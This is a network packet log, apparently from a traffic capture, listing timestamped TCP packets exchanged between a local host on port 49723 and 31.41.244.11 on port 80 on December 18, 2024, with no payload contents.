Dec 18, 2024 13:38:46.312726021 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.314233065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.314378977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.314536095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.314785004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.316152096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.316194057 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.316715002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.316765070 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.317262888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.317384005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.317569971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.317625999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.318819046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.318964005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.319030046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.319077969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.320285082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.320343971 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.320446014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.320502043 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.322017908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.322072029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.322105885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.322287083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.323425055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.323503971 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.323534012 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.323694944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.324928045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.324997902 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.325114012 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.325192928 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.326582909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.326648951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.326750994 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.326837063 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.328092098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.328145027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.328211069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.328303099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.329570055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.329638958 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.329771996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.329930067 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.331141949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.331212044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.331351995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.331419945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.332654953 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.332695961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.332837105 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.332886934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.334218979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.334275007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.334369898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.334460974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.335841894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.335902929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.335954905 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.336040020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.337321997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.337395906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.337477922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.337585926 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.338886023 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.338948011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.339009047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.339160919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.340451956 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.340562105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.340586901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.340635061 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.341943026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.341994047 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.342097044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.342138052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.343648911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.343688011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.343754053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.343806028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.345103979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.345165968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.458998919 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.459111929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.459161997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.459265947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.459772110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.459871054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.460057020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.460135937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.460959911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.461014032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.461191893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.461316109 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.462354898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.462511063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.462580919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.462580919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.463695049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.463826895 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.463990927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.464061022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.465075970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.465131998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.465318918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.465383053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.466370106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.466517925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.466546059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.466908932 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.467531919 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.467607975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.467669010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.467742920 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.468861103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.468986988 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.469183922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.469247103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.470087051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.470181942 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.470263958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.470347881 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.471162081 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.471219063 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.471333027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.471421003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.472418070 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.472486019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.472600937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.472728014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.473654985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.473722935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.473953962 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.474019051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.474920034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.474970102 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.475037098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.475085974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.476077080 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.476141930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.476239920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.476311922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.477400064 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.477448940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.477749109 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.477833033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.478542089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.478606939 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.478705883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.478749990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.479844093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.479938030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.479975939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.480217934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.481024981 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.481162071 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.481252909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.481312990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.482408047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.482475996 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.482551098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.482625961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.483458996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.483511925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.483608961 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.483659029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.484692097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.484750032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.484858036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.484895945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.485888958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.485938072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.486176014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.486243963 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.487116098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.487157106 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.487354040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.487452030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.488382101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.488425970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.488595009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.488641024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.489593983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.489675999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.489865065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.489933014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.490813017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.490874052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.490957022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.491333961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.492286921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.492428064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.492506027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.492624998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.493226051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.493277073 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.493562937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.493622065 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.494688988 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.494734049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.494838953 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.494894981 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.495764017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.495843887 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.495919943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.495970011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.496984005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.497174025 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.497179985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.497311115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.498317003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.498378992 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.498759985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.498816013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.499481916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.499571085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.499607086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.499618053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.500937939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.501013041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.501069069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.501105070 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.501940966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.501995087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.502129078 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.502250910 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.503303051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.503359079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.503535986 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.503602028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.505203009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.505343914 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.505570889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.505613089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.506607056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.506640911 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.506664991 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.506685972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.507420063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.507627964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.507680893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.507816076 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.508713961 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.508793116 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.508930922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.508986950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.510679007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.510735989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.510915995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.510977983 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.511724949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.511775017 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.511923075 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.512059927 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.512733936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.512811899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.512865067 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.512943029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.513762951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.513864040 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.513976097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.514101982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.514858961 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.514944077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.515034914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.515105963 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.515789986 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.515827894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.515906096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.516009092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.516701937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.516777992 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.517038107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.517128944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.517843962 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.517963886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.517990112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.518049002 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.519026041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.519124985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.519206047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.519330025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.520255089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.520308971 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.520466089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.520598888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.521898985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.521910906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.521995068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.521995068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.522706032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.522762060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.523009062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.523056984 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.523873091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.524024010 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.651221037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.651340961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.651381016 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.651479959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.651786089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.651875019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.651987076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.652036905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.652968884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.653031111 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.653409958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.653458118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.654409885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.654423952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.654459000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.654737949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.655360937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.655431032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.655462027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.655632019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.656666994 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.656819105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.656985044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.657073975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.658113956 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.658206940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.658302069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.658358097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.659363031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.659503937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.659589052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.659745932 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.660278082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.660334110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.660362959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.660547018 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.661402941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.661503077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.661642075 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.661732912 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.662247896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:46.662342072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:46.662502050 CET	80	49723	31.41.244.11	192.168.2.8
